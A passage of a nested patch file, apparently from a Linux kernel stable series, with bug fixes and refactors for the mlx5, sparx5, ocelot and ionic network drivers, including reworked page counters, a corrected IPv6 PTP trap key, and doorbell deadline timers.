+-	int err = 0;
+-	int i;
+-
+-	for (i = 0; i < chs->num; i++) {
+-		err = mlx5e_modify_rq_scatter_fcs(&chs->c[i]->rq, enable);
+-		if (err)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+ static int mlx5e_modify_channels_vsd(struct mlx5e_channels *chs, bool vsd)
+ {
+ 	int err;
+@@ -3890,41 +3848,27 @@ static int mlx5e_set_rx_port_ts(struct mlx5_core_dev *mdev, bool enable)
+ 	return mlx5_set_ports_check(mdev, in, sizeof(in));
+ }
+ 
++static int mlx5e_set_rx_port_ts_wrap(struct mlx5e_priv *priv, void *ctx)
++{
++	struct mlx5_core_dev *mdev = priv->mdev;
++	bool enable = *(bool *)ctx;
++
++	return mlx5e_set_rx_port_ts(mdev, enable);
++}
++
+ static int set_feature_rx_fcs(struct net_device *netdev, bool enable)
+ {
+ 	struct mlx5e_priv *priv = netdev_priv(netdev);
+ 	struct mlx5e_channels *chs = &priv->channels;
+-	struct mlx5_core_dev *mdev = priv->mdev;
++	struct mlx5e_params new_params;
+ 	int err;
+ 
+ 	mutex_lock(&priv->state_lock);
+ 
+-	if (enable) {
+-		err = mlx5e_set_rx_port_ts(mdev, false);
+-		if (err)
+-			goto out;
+-
+-		chs->params.scatter_fcs_en = true;
+-		err = mlx5e_modify_channels_scatter_fcs(chs, true);
+-		if (err) {
+-			chs->params.scatter_fcs_en = false;
+-			mlx5e_set_rx_port_ts(mdev, true);
+-		}
+-	} else {
+-		chs->params.scatter_fcs_en = false;
+-		err = mlx5e_modify_channels_scatter_fcs(chs, false);
+-		if (err) {
+-			chs->params.scatter_fcs_en = true;
+-			goto out;
+-		}
+-		err = mlx5e_set_rx_port_ts(mdev, true);
+-		if (err) {
+-			mlx5_core_warn(mdev, "Failed to set RX port timestamp %d\n", err);
+-			err = 0;
+-		}
+-	}
+-
+-out:
++	new_params = chs->params;
++	new_params.scatter_fcs_en = enable;
++	err = mlx5e_safe_switch_params(priv, &new_params, mlx5e_set_rx_port_ts_wrap,
++				       &new_params.scatter_fcs_en, true);
+ 	mutex_unlock(&priv->state_lock);
+ 	return err;
+ }
+@@ -4061,6 +4005,10 @@ static netdev_features_t mlx5e_fix_uplink_rep_features(struct net_device *netdev
+ 	if (netdev->features & NETIF_F_GRO_HW)
+ 		netdev_warn(netdev, "Disabling HW_GRO, not supported in switchdev mode\n");
+ 
++	features &= ~NETIF_F_HW_VLAN_CTAG_FILTER;
++	if (netdev->features & NETIF_F_HW_VLAN_CTAG_FILTER)
++		netdev_warn(netdev, "Disabling HW_VLAN CTAG FILTERING, not supported in switchdev mode\n");
++
+ 	return features;
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/bridge.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/bridge.c
+index 4fbff7bcc1556..d0b2676c32145 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/bridge.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/bridge.c
+@@ -1715,7 +1715,7 @@ void mlx5_esw_bridge_fdb_update_used(struct net_device *dev, u16 vport_num, u16
+ 	struct mlx5_esw_bridge *bridge;
+ 
+ 	port = mlx5_esw_bridge_port_lookup(vport_num, esw_owner_vhca_id, br_offloads);
+-	if (!port || port->flags & MLX5_ESW_BRIDGE_PORT_FLAG_PEER)
++	if (!port)
+ 		return;
+ 
+ 	bridge = port->bridge;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ethtool.c
+index eff92dc0927c1..e09518f887a04 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ethtool.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ethtool.c
+@@ -189,16 +189,16 @@ static inline int mlx5_ptys_rate_enum_to_int(enum mlx5_ptys_rate rate)
+ 	}
+ }
+ 
+-static int mlx5i_get_speed_settings(u16 ib_link_width_oper, u16 ib_proto_oper)
++static u32 mlx5i_get_speed_settings(u16 ib_link_width_oper, u16 ib_proto_oper)
+ {
+ 	int rate, width;
+ 
+ 	rate = mlx5_ptys_rate_enum_to_int(ib_proto_oper);
+ 	if (rate < 0)
+-		return -EINVAL;
++		return SPEED_UNKNOWN;
+ 	width = mlx5_ptys_width_enum_to_int(ib_link_width_oper);
+ 	if (width < 0)
+-		return -EINVAL;
++		return SPEED_UNKNOWN;
+ 
+ 	return rate * width;
+ }
+@@ -221,16 +221,13 @@ static int mlx5i_get_link_ksettings(struct net_device *netdev,
+ 	ethtool_link_ksettings_zero_link_mode(link_ksettings, advertising);
+ 
+ 	speed = mlx5i_get_speed_settings(ib_link_width_oper, ib_proto_oper);
+-	if (speed < 0)
+-		return -EINVAL;
++	link_ksettings->base.speed = speed;
++	link_ksettings->base.duplex = speed == SPEED_UNKNOWN ? DUPLEX_UNKNOWN : DUPLEX_FULL;
+ 
+-	link_ksettings->base.duplex = DUPLEX_FULL;
+ 	link_ksettings->base.port = PORT_OTHER;
+ 
+ 	link_ksettings->base.autoneg = AUTONEG_DISABLE;
+ 
+-	link_ksettings->base.speed = speed;
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index d4db1adae3e3d..f07175549a87d 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -2094,7 +2094,7 @@ static int __init mlx5_init(void)
+ 	mlx5_core_verify_params();
+ 	mlx5_register_debugfs();
+ 
+-	err = pci_register_driver(&mlx5_core_driver);
++	err = mlx5e_init();
+ 	if (err)
+ 		goto err_debug;
+ 
+@@ -2102,16 +2102,16 @@ static int __init mlx5_init(void)
+ 	if (err)
+ 		goto err_sf;
+ 
+-	err = mlx5e_init();
++	err = pci_register_driver(&mlx5_core_driver);
+ 	if (err)
+-		goto err_en;
++		goto err_pci;
+ 
+ 	return 0;
+ 
+-err_en:
++err_pci:
+ 	mlx5_sf_driver_unregister();
+ err_sf:
+-	pci_unregister_driver(&mlx5_core_driver);
++	mlx5e_cleanup();
+ err_debug:
+ 	mlx5_unregister_debugfs();
+ 	return err;
+@@ -2119,9 +2119,9 @@ err_debug:
+ 
+ static void __exit mlx5_cleanup(void)
+ {
+-	mlx5e_cleanup();
+-	mlx5_sf_driver_unregister();
+ 	pci_unregister_driver(&mlx5_core_driver);
++	mlx5_sf_driver_unregister();
++	mlx5e_cleanup();
+ 	mlx5_unregister_debugfs();
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+index 60596357bfc7a..0eb50be175cc4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+@@ -74,6 +74,14 @@ static u32 get_function(u16 func_id, bool ec_function)
+ 	return (u32)func_id | (ec_function << 16);
+ }
+ 
++static u16 func_id_to_type(struct mlx5_core_dev *dev, u16 func_id, bool ec_function)
++{
++	if (!func_id)
++		return mlx5_core_is_ecpf(dev) && !ec_function ? MLX5_HOST_PF : MLX5_PF;
++
++	return func_id <= mlx5_core_max_vfs(dev) ?  MLX5_VF : MLX5_SF;
++}
++
+ static struct rb_root *page_root_per_function(struct mlx5_core_dev *dev, u32 function)
+ {
+ 	struct rb_root *root;
+@@ -332,6 +340,7 @@ static int give_pages(struct mlx5_core_dev *dev, u16 func_id, int npages,
+ 	u32 out[MLX5_ST_SZ_DW(manage_pages_out)] = {0};
+ 	int inlen = MLX5_ST_SZ_BYTES(manage_pages_in);
+ 	int notify_fail = event;
++	u16 func_type;
+ 	u64 addr;
+ 	int err;
+ 	u32 *in;
+@@ -383,11 +392,9 @@ retry:
+ 		goto out_dropped;
+ 	}
+ 
++	func_type = func_id_to_type(dev, func_id, ec_function);
++	dev->priv.page_counters[func_type] += npages;
+ 	dev->priv.fw_pages += npages;
+-	if (func_id)
+-		dev->priv.vfs_pages += npages;
+-	else if (mlx5_core_is_ecpf(dev) && !ec_function)
+-		dev->priv.host_pf_pages += npages;
+ 
+ 	mlx5_core_dbg(dev, "npages %d, ec_function %d, func_id 0x%x, err %d\n",
+ 		      npages, ec_function, func_id, err);
+@@ -414,6 +421,7 @@ static void release_all_pages(struct mlx5_core_dev *dev, u16 func_id,
+ 	struct rb_root *root;
+ 	struct rb_node *p;
+ 	int npages = 0;
++	u16 func_type;
+ 
+ 	root = xa_load(&dev->priv.page_root_xa, function);
+ 	if (WARN_ON_ONCE(!root))
+@@ -428,11 +436,9 @@ static void release_all_pages(struct mlx5_core_dev *dev, u16 func_id,
+ 		free_fwp(dev, fwp, fwp->free_count);
+ 	}
+ 
++	func_type = func_id_to_type(dev, func_id, ec_function);
++	dev->priv.page_counters[func_type] -= npages;
+ 	dev->priv.fw_pages -= npages;
+-	if (func_id)
+-		dev->priv.vfs_pages -= npages;
+-	else if (mlx5_core_is_ecpf(dev) && !ec_function)
+-		dev->priv.host_pf_pages -= npages;
+ 
+ 	mlx5_core_dbg(dev, "npages %d, ec_function %d, func_id 0x%x\n",
+ 		      npages, ec_function, func_id);
+@@ -498,6 +504,7 @@ static int reclaim_pages(struct mlx5_core_dev *dev, u16 func_id, int npages,
+ 	int outlen = MLX5_ST_SZ_BYTES(manage_pages_out);
+ 	u32 in[MLX5_ST_SZ_DW(manage_pages_in)] = {};
+ 	int num_claimed;
++	u16 func_type;
+ 	u32 *out;
+ 	int err;
+ 	int i;
+@@ -549,11 +556,9 @@ static int reclaim_pages(struct mlx5_core_dev *dev, u16 func_id, int npages,
+ 	if (nclaimed)
+ 		*nclaimed = num_claimed;
+ 
++	func_type = func_id_to_type(dev, func_id, ec_function);
++	dev->priv.page_counters[func_type] -= num_claimed;
+ 	dev->priv.fw_pages -= num_claimed;
+-	if (func_id)
+-		dev->priv.vfs_pages -= num_claimed;
+-	else if (mlx5_core_is_ecpf(dev) && !ec_function)
+-		dev->priv.host_pf_pages -= num_claimed;
+ 
+ out_free:
+ 	kvfree(out);
+@@ -706,12 +711,12 @@ int mlx5_reclaim_startup_pages(struct mlx5_core_dev *dev)
+ 	WARN(dev->priv.fw_pages,
+ 	     "FW pages counter is %d after reclaiming all pages\n",
+ 	     dev->priv.fw_pages);
+-	WARN(dev->priv.vfs_pages,
++	WARN(dev->priv.page_counters[MLX5_VF],
+ 	     "VFs FW pages counter is %d after reclaiming all pages\n",
+-	     dev->priv.vfs_pages);
+-	WARN(dev->priv.host_pf_pages,
++	     dev->priv.page_counters[MLX5_VF]);
++	WARN(dev->priv.page_counters[MLX5_HOST_PF],
+ 	     "External host PF FW pages counter is %d after reclaiming all pages\n",
+-	     dev->priv.host_pf_pages);
++	     dev->priv.page_counters[MLX5_HOST_PF]);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/sriov.c b/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
+index c0e6c487c63c1..3008e9ce2bbff 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
+@@ -147,7 +147,7 @@ mlx5_device_disable_sriov(struct mlx5_core_dev *dev, int num_vfs, bool clear_vf)
+ 
+ 	mlx5_eswitch_disable_sriov(dev->priv.eswitch, clear_vf);
+ 
+-	if (mlx5_wait_for_pages(dev, &dev->priv.vfs_pages))
++	if (mlx5_wait_for_pages(dev, &dev->priv.page_counters[MLX5_VF]))
+ 		mlx5_core_warn(dev, "timeout reclaiming VFs pages\n");
+ }
+ 
+diff --git a/drivers/net/ethernet/microchip/sparx5/sparx5_ptp.c b/drivers/net/ethernet/microchip/sparx5/sparx5_ptp.c
+index 0ed1ea7727c54..69e76634f9aa8 100644
+--- a/drivers/net/ethernet/microchip/sparx5/sparx5_ptp.c
++++ b/drivers/net/ethernet/microchip/sparx5/sparx5_ptp.c
+@@ -633,7 +633,7 @@ int sparx5_ptp_init(struct sparx5 *sparx5)
+ 	/* Enable master counters */
+ 	spx5_wr(PTP_PTP_DOM_CFG_PTP_ENA_SET(0x7), sparx5, PTP_PTP_DOM_CFG);
+ 
+-	for (i = 0; i < sparx5->port_count; i++) {
++	for (i = 0; i < SPX5_PORTS; i++) {
+ 		port = sparx5->ports[i];
+ 		if (!port)
+ 			continue;
+@@ -649,7 +649,7 @@ void sparx5_ptp_deinit(struct sparx5 *sparx5)
+ 	struct sparx5_port *port;
+ 	int i;
+ 
+-	for (i = 0; i < sparx5->port_count; i++) {
++	for (i = 0; i < SPX5_PORTS; i++) {
+ 		port = sparx5->ports[i];
+ 		if (!port)
+ 			continue;
+diff --git a/drivers/net/ethernet/mscc/ocelot_flower.c b/drivers/net/ethernet/mscc/ocelot_flower.c
+index 7c0897e779dc6..ee052404eb55a 100644
+--- a/drivers/net/ethernet/mscc/ocelot_flower.c
++++ b/drivers/net/ethernet/mscc/ocelot_flower.c
+@@ -605,6 +605,18 @@ ocelot_flower_parse_key(struct ocelot *ocelot, int port, bool ingress,
+ 		flow_rule_match_control(rule, &match);
+ 	}
+ 
++	if (flow_rule_match_key(rule, FLOW_DISSECTOR_KEY_VLAN)) {
++		struct flow_match_vlan match;
++
++		flow_rule_match_vlan(rule, &match);
++		filter->key_type = OCELOT_VCAP_KEY_ANY;
++		filter->vlan.vid.value = match.key->vlan_id;
++		filter->vlan.vid.mask = match.mask->vlan_id;
++		filter->vlan.pcp.value[0] = match.key->vlan_priority;
++		filter->vlan.pcp.mask[0] = match.mask->vlan_priority;
++		match_protocol = false;
++	}
++
+ 	if (flow_rule_match_key(rule, FLOW_DISSECTOR_KEY_ETH_ADDRS)) {
+ 		struct flow_match_eth_addrs match;
+ 
+@@ -737,18 +749,6 @@ ocelot_flower_parse_key(struct ocelot *ocelot, int port, bool ingress,
+ 		match_protocol = false;
+ 	}
+ 
+-	if (flow_rule_match_key(rule, FLOW_DISSECTOR_KEY_VLAN)) {
+-		struct flow_match_vlan match;
+-
+-		flow_rule_match_vlan(rule, &match);
+-		filter->key_type = OCELOT_VCAP_KEY_ANY;
+-		filter->vlan.vid.value = match.key->vlan_id;
+-		filter->vlan.vid.mask = match.mask->vlan_id;
+-		filter->vlan.pcp.value[0] = match.key->vlan_priority;
+-		filter->vlan.pcp.mask[0] = match.mask->vlan_priority;
+-		match_protocol = false;
+-	}
+-
+ finished_key_parsing:
+ 	if (match_protocol && proto != ETH_P_ALL) {
+ 		if (filter->block_id == VCAP_ES0) {
+diff --git a/drivers/net/ethernet/mscc/ocelot_ptp.c b/drivers/net/ethernet/mscc/ocelot_ptp.c
+index 1a82f10c88539..2180ae94c7447 100644
+--- a/drivers/net/ethernet/mscc/ocelot_ptp.c
++++ b/drivers/net/ethernet/mscc/ocelot_ptp.c
+@@ -335,8 +335,8 @@ static void
+ ocelot_populate_ipv6_ptp_event_trap_key(struct ocelot_vcap_filter *trap)
+ {
+ 	trap->key_type = OCELOT_VCAP_KEY_IPV6;
+-	trap->key.ipv4.proto.value[0] = IPPROTO_UDP;
+-	trap->key.ipv4.proto.mask[0] = 0xff;
++	trap->key.ipv6.proto.value[0] = IPPROTO_UDP;
++	trap->key.ipv6.proto.mask[0] = 0xff;
+ 	trap->key.ipv6.dport.value = PTP_EV_PORT;
+ 	trap->key.ipv6.dport.mask = 0xffff;
+ }
+@@ -355,8 +355,8 @@ static void
+ ocelot_populate_ipv6_ptp_general_trap_key(struct ocelot_vcap_filter *trap)
+ {
+ 	trap->key_type = OCELOT_VCAP_KEY_IPV6;
+-	trap->key.ipv4.proto.value[0] = IPPROTO_UDP;
+-	trap->key.ipv4.proto.mask[0] = 0xff;
++	trap->key.ipv6.proto.value[0] = IPPROTO_UDP;
++	trap->key.ipv6.proto.mask[0] = 0xff;
+ 	trap->key.ipv6.dport.value = PTP_GEN_PORT;
+ 	trap->key.ipv6.dport.mask = 0xffff;
+ }
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_dev.c b/drivers/net/ethernet/pensando/ionic/ionic_dev.c
+index 9d0514cfeb5c2..344a3924627d4 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_dev.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_dev.c
+@@ -694,9 +694,16 @@ void ionic_q_post(struct ionic_queue *q, bool ring_doorbell, ionic_desc_cb cb,
+ 		q->lif->index, q->name, q->hw_type, q->hw_index,
+ 		q->head_idx, ring_doorbell);
+ 
+-	if (ring_doorbell)
++	if (ring_doorbell) {
+ 		ionic_dbell_ring(lif->kern_dbpage, q->hw_type,
+ 				 q->dbval | q->head_idx);
++
++		q->dbell_jiffies = jiffies;
++
++		if (q_to_qcq(q)->napi_qcq)
++			mod_timer(&q_to_qcq(q)->napi_qcq->napi_deadline,
++				  jiffies + IONIC_NAPI_DEADLINE);
++	}
+ }
+ 
+ static bool ionic_q_is_posted(struct ionic_queue *q, unsigned int pos)
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_dev.h b/drivers/net/ethernet/pensando/ionic/ionic_dev.h
+index 563c302eb033d..ad8a2a4453b76 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_dev.h
++++ b/drivers/net/ethernet/pensando/ionic/ionic_dev.h
+@@ -25,6 +25,12 @@
+ #define IONIC_DEV_INFO_REG_COUNT	32
+ #define IONIC_DEV_CMD_REG_COUNT		32
+ 
++#define IONIC_NAPI_DEADLINE		(HZ / 200)	/* 5ms */
++#define IONIC_ADMIN_DOORBELL_DEADLINE	(HZ / 2)	/* 500ms */
++#define IONIC_TX_DOORBELL_DEADLINE	(HZ / 100)	/* 10ms */
++#define IONIC_RX_MIN_DOORBELL_DEADLINE	(HZ / 100)	/* 10ms */
++#define IONIC_RX_MAX_DOORBELL_DEADLINE	(HZ * 5)	/* 5s */
++
+ struct ionic_dev_bar {
+ 	void __iomem *vaddr;
+ 	phys_addr_t bus_addr;
+@@ -214,6 +220,8 @@ struct ionic_queue {
+ 	struct ionic_lif *lif;
+ 	struct ionic_desc_info *info;
+ 	u64 dbval;
++	unsigned long dbell_deadline;
++	unsigned long dbell_jiffies;
+ 	u16 head_idx;
+ 	u16 tail_idx;
+ 	unsigned int index;
+@@ -358,4 +366,8 @@ void ionic_q_service(struct ionic_queue *q, struct ionic_cq_info *cq_info,
+ int ionic_heartbeat_check(struct ionic *ionic);
+ bool ionic_is_fw_running(struct ionic_dev *idev);
+ 
++bool ionic_adminq_poke_doorbell(struct ionic_queue *q);
++bool ionic_txq_poke_doorbell(struct ionic_queue *q);
++bool ionic_rxq_poke_doorbell(struct ionic_queue *q);
++
+ #endif /* _IONIC_DEV_H_ */
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_lif.c b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+index 19d4848df17df..159bfcc76498c 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_lif.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+@@ -16,6 +16,7 @@
+ 
+ #include "ionic.h"
+ #include "ionic_bus.h"
++#include "ionic_dev.h"
+ #include "ionic_lif.h"
+ #include "ionic_txrx.h"
+ #include "ionic_ethtool.h"
+@@ -200,6 +201,13 @@ void ionic_link_status_check_request(struct ionic_lif *lif, bool can_sleep)
+ 	}
+ }
+ 
++static void ionic_napi_deadline(struct timer_list *timer)
++{
++	struct ionic_qcq *qcq = container_of(timer, struct ionic_qcq, napi_deadline);
++
++	napi_schedule(&qcq->napi);
++}
++
+ static irqreturn_t ionic_isr(int irq, void *data)
+ {
+ 	struct napi_struct *napi = data;
+@@ -269,6 +277,7 @@ static int ionic_qcq_enable(struct ionic_qcq *qcq)
+ 			.oper = IONIC_Q_ENABLE,
+ 		},
+ 	};
++	int ret;
+ 
+ 	idev = &lif->ionic->idev;
+ 	dev = lif->ionic->dev;
+@@ -276,16 +285,24 @@ static int ionic_qcq_enable(struct ionic_qcq *qcq)
+ 	dev_dbg(dev, "q_enable.index %d q_enable.qtype %d\n",
+ 		ctx.cmd.q_control.index, ctx.cmd.q_control.type);
+ 
++	if (qcq->flags & IONIC_QCQ_F_INTR)
++		ionic_intr_clean(idev->intr_ctrl, qcq->intr.index);
++
++	ret = ionic_adminq_post_wait(lif, &ctx);
++	if (ret)
++		return ret;
++
++	if (qcq->napi.poll)
++		napi_enable(&qcq->napi);
++
+ 	if (qcq->flags & IONIC_QCQ_F_INTR) {
+ 		irq_set_affinity_hint(qcq->intr.vector,
+ 				      &qcq->intr.affinity_mask);
+-		napi_enable(&qcq->napi);
+-		ionic_intr_clean(idev->intr_ctrl, qcq->intr.index);
+ 		ionic_intr_mask(idev->intr_ctrl, qcq->intr.index,
+ 				IONIC_INTR_MASK_CLEAR);
+ 	}
+ 
+-	return ionic_adminq_post_wait(lif, &ctx);
++	return 0;
+ }
+ 
+ static int ionic_qcq_disable(struct ionic_lif *lif, struct ionic_qcq *qcq, int fw_err)
+@@ -316,6 +333,7 @@ static int ionic_qcq_disable(struct ionic_lif *lif, struct ionic_qcq *qcq, int f
+ 		synchronize_irq(qcq->intr.vector);
+ 		irq_set_affinity_hint(qcq->intr.vector, NULL);
+ 		napi_disable(&qcq->napi);
++		del_timer_sync(&qcq->napi_deadline);
+ 	}
+ 
+ 	/* If there was a previous fw communcation error, don't bother with
+@@ -451,6 +469,7 @@ static void ionic_link_qcq_interrupts(struct ionic_qcq *src_qcq,
+ 
+ 	n_qcq->intr.vector = src_qcq->intr.vector;
+ 	n_qcq->intr.index = src_qcq->intr.index;
++	n_qcq->napi_qcq = src_qcq->napi_qcq;
+ }
+ 
+ static int ionic_alloc_qcq_interrupt(struct ionic_lif *lif, struct ionic_qcq *qcq)
+@@ -773,8 +792,14 @@ static int ionic_lif_txq_init(struct ionic_lif *lif, struct ionic_qcq *qcq)
+ 	dev_dbg(dev, "txq->hw_type %d\n", q->hw_type);
+ 	dev_dbg(dev, "txq->hw_index %d\n", q->hw_index);
+ 
+-	if (test_bit(IONIC_LIF_F_SPLIT_INTR, lif->state))
++	q->dbell_deadline = IONIC_TX_DOORBELL_DEADLINE;
++	q->dbell_jiffies = jiffies;
++
++	if (test_bit(IONIC_LIF_F_SPLIT_INTR, lif->state)) {
+ 		netif_napi_add(lif->netdev, &qcq->napi, ionic_tx_napi);
++		qcq->napi_qcq = qcq;
++		timer_setup(&qcq->napi_deadline, ionic_napi_deadline, 0);
++	}
+ 
+ 	qcq->flags |= IONIC_QCQ_F_INITED;
+ 
+@@ -828,11 +853,17 @@ static int ionic_lif_rxq_init(struct ionic_lif *lif, struct ionic_qcq *qcq)
+ 	dev_dbg(dev, "rxq->hw_type %d\n", q->hw_type);
+ 	dev_dbg(dev, "rxq->hw_index %d\n", q->hw_index);
+ 
++	q->dbell_deadline = IONIC_RX_MIN_DOORBELL_DEADLINE;
++	q->dbell_jiffies = jiffies;
++
+ 	if (test_bit(IONIC_LIF_F_SPLIT_INTR, lif->state))
+ 		netif_napi_add(lif->netdev, &qcq->napi, ionic_rx_napi);
+ 	else
+ 		netif_napi_add(lif->netdev, &qcq->napi, ionic_txrx_napi);
+ 
++	qcq->napi_qcq = qcq;
++	timer_setup(&qcq->napi_deadline, ionic_napi_deadline, 0);
++
+ 	qcq->flags |= IONIC_QCQ_F_INITED;
+ 
+ 	return 0;
+@@ -1150,6 +1181,7 @@ static int ionic_adminq_napi(struct napi_struct *napi, int budget)
+ 	struct ionic_dev *idev = &lif->ionic->idev;
+ 	unsigned long irqflags;
+ 	unsigned int flags = 0;
++	bool resched = false;
+ 	int rx_work = 0;
+ 	int tx_work = 0;
+ 	int n_work = 0;
+@@ -1187,6 +1219,16 @@ static int ionic_adminq_napi(struct napi_struct *napi, int budget)
+ 		ionic_intr_credits(idev->intr_ctrl, intr->index, credits, flags);
+ 	}
+ 
++	if (!a_work && ionic_adminq_poke_doorbell(&lif->adminqcq->q))
++		resched = true;
++	if (lif->hwstamp_rxq && !rx_work && ionic_rxq_poke_doorbell(&lif->hwstamp_rxq->q))
++		resched = true;
++	if (lif->hwstamp_txq && !tx_work && ionic_txq_poke_doorbell(&lif->hwstamp_txq->q))
++		resched = true;
++	if (resched)
++		mod_timer(&lif->adminqcq->napi_deadline,
++			  jiffies + IONIC_NAPI_DEADLINE);
++
+ 	return work_done;
+ }
+ 
+@@ -3166,8 +3208,14 @@ static int ionic_lif_adminq_init(struct ionic_lif *lif)
+ 	dev_dbg(dev, "adminq->hw_type %d\n", q->hw_type);
+ 	dev_dbg(dev, "adminq->hw_index %d\n", q->hw_index);
+ 
++	q->dbell_deadline = IONIC_ADMIN_DOORBELL_DEADLINE;
++	q->dbell_jiffies = jiffies;
++
+ 	netif_napi_add(lif->netdev, &qcq->napi, ionic_adminq_napi);
+ 
++	qcq->napi_qcq = qcq;
++	timer_setup(&qcq->napi_deadline, ionic_napi_deadline, 0);
++
+ 	napi_enable(&qcq->napi);
+ 
+ 	if (qcq->flags & IONIC_QCQ_F_INTR)
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_lif.h b/drivers/net/ethernet/pensando/ionic/ionic_lif.h
+index a53984bf35448..734519895614f 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_lif.h
++++ b/drivers/net/ethernet/pensando/ionic/ionic_lif.h
+@@ -74,8 +74,10 @@ struct ionic_qcq {
+ 	struct ionic_queue q;
+ 	struct ionic_cq cq;
+ 	struct ionic_intr_info intr;
++	struct timer_list napi_deadline;
+ 	struct napi_struct napi;
+ 	unsigned int flags;
++	struct ionic_qcq *napi_qcq;
+ 	struct dentry *dentry;
+ };
+ 
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_main.c b/drivers/net/ethernet/pensando/ionic/ionic_main.c
+index 5456c2b15d9bd..79272f5f380c6 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_main.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_main.c
+@@ -289,6 +289,35 @@ static void ionic_adminq_cb(struct ionic_queue *q,
+ 	complete_all(&ctx->work);
+ }
+ 
++bool ionic_adminq_poke_doorbell(struct ionic_queue *q)
++{
++	struct ionic_lif *lif = q->lif;
++	unsigned long now, then, dif;
++	unsigned long irqflags;
++
++	spin_lock_irqsave(&lif->adminq_lock, irqflags);
++
++	if (q->tail_idx == q->head_idx) {
++		spin_unlock_irqrestore(&lif->adminq_lock, irqflags);
++		return false;
++	}
++
++	now = READ_ONCE(jiffies);
++	then = q->dbell_jiffies;
++	dif = now - then;
++
++	if (dif > q->dbell_deadline) {
++		ionic_dbell_ring(q->lif->kern_dbpage, q->hw_type,
++				 q->dbval | q->head_idx);
++
++		q->dbell_jiffies = now;
++	}
++
++	spin_unlock_irqrestore(&lif->adminq_lock, irqflags);
++
++	return true;
++}
++
+ int ionic_adminq_post(struct ionic_lif *lif, struct ionic_admin_ctx *ctx)
+ {
+ 	struct ionic_desc_info *desc_info;
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_txrx.c b/drivers/net/ethernet/pensando/ionic/ionic_txrx.c
+index c03986bf26289..f8f5eb1307681 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_txrx.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_txrx.c
+@@ -22,6 +22,67 @@ static inline void ionic_rxq_post(struct ionic_queue *q, bool ring_dbell,
+ 	ionic_q_post(q, ring_dbell, cb_func, cb_arg);
+ }
+ 
++bool ionic_txq_poke_doorbell(struct ionic_queue *q)
++{
++	unsigned long now, then, dif;
++	struct netdev_queue *netdev_txq;
++	struct net_device *netdev;
++
++	netdev = q->lif->netdev;
++	netdev_txq = netdev_get_tx_queue(netdev, q->index);
++
++	HARD_TX_LOCK(netdev, netdev_txq, smp_processor_id());
++
++	if (q->tail_idx == q->head_idx) {
++		HARD_TX_UNLOCK(netdev, netdev_txq);
++		return false;
++	}
++
++	now = READ_ONCE(jiffies);
++	then = q->dbell_jiffies;
++	dif = now - then;
++
++	if (dif > q->dbell_deadline) {
++		ionic_dbell_ring(q->lif->kern_dbpage, q->hw_type,
++				 q->dbval | q->head_idx);
++
++		q->dbell_jiffies = now;
++	}
++
++	HARD_TX_UNLOCK(netdev, netdev_txq);
++
++	return true;
++}
++
++bool ionic_rxq_poke_doorbell(struct ionic_queue *q)
++{
++	unsigned long now, then, dif;
++
++	/* no lock, called from rx napi or txrx napi, nothing else can fill */
++
++	if (q->tail_idx == q->head_idx)
++		return false;
++
++	now = READ_ONCE(jiffies);
++	then = q->dbell_jiffies;
++	dif = now - then;
++
++	if (dif > q->dbell_deadline) {
++		ionic_dbell_ring(q->lif->kern_dbpage, q->hw_type,
++				 q->dbval | q->head_idx);
++
++		q->dbell_jiffies = now;
++
++		dif = 2 * q->dbell_deadline;
++		if (dif > IONIC_RX_MAX_DOORBELL_DEADLINE)
++			dif = IONIC_RX_MAX_DOORBELL_DEADLINE;
++
++		q->dbell_deadline = dif;
++	}
++
++	return true;
++}
++
+ static inline struct netdev_queue *q_to_ndq(struct ionic_queue *q)
+ {
+ 	return netdev_get_tx_queue(q->lif->netdev, q->index);
+@@ -348,16 +409,25 @@ void ionic_rx_fill(struct ionic_queue *q)
+ 	struct ionic_rxq_sg_desc *sg_desc;
+ 	struct ionic_rxq_sg_elem *sg_elem;
+ 	struct ionic_buf_info *buf_info;
++	unsigned int fill_threshold;
+ 	struct ionic_rxq_desc *desc;
+ 	unsigned int remain_len;
+ 	unsigned int frag_len;
+ 	unsigned int nfrags;
++	unsigned int n_fill;
+ 	unsigned int i, j;
+ 	unsigned int len;
+ 
++	n_fill = ionic_q_space_avail(q);
++
